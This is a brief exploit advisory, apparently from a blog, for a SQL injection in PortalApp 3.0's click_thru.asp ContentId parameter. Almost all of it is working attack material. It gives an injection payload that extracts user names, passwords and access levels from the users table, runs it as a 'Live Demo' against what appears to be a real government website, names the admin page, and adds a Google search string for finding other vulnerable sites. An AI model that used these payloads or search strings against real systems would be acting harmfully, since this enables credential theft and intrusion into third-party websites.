PortalApp Version 3.0 SQL Injection
###########################################################################
Exploit :click_thru.asp?ContentId=
Example :click_thru.asp?ContentId=52 and (select Top 1 char(124)+isnull(cast([accesslevel] as varchar(8000)),char(32))+char(124)+isNull(cast([password] as varchar(8000)),char(32))+char(124)+isNull(cast([user_name] as varchar(8000)),char(32))+char(124) from (Select Top 19 [accesslevel],[password],[user_name] From [users] where 1=1 order by [accesslevel],[password],[user_name]) T order by [accesslevel] desc,[password] desc,[user_name] desc)>0 --
Live Demo:http://www.sc-isac.sc.gov/click_thru.asp?ContentId=525 and (select Top 1 char(124)+isnull(cast([accesslevel] as varchar(8000)),char(32))+char(124)+isNull(cast([password] as varchar(8000)),char(32))+char(124)+isNull(cast([user_name] as varchar(8000)),char(32))+char(124) from (Select Top 19 [accesslevel],[password],[user_name] From [users] where 1=1 order by [accesslevel],[password],[user_name]) T order by [accesslevel] desc,[password] desc,[user_name] desc)>0 --
http://site/admin.asp
###########################################################################
users
accesslevel
user_name
password
###########################################################################
Loopholes found By: Xiaoran
Contact : cn-xiaoran[at]hotmail[dot]com
blog : www.xiaoran.org
###########################################################################
download : http://www.asprehberi.net/dosyalar/kategoriler/portal/portalapp1_v30.zip
google : inurl:click_thru.asp?ContentId=
0 comments:
Post a Comment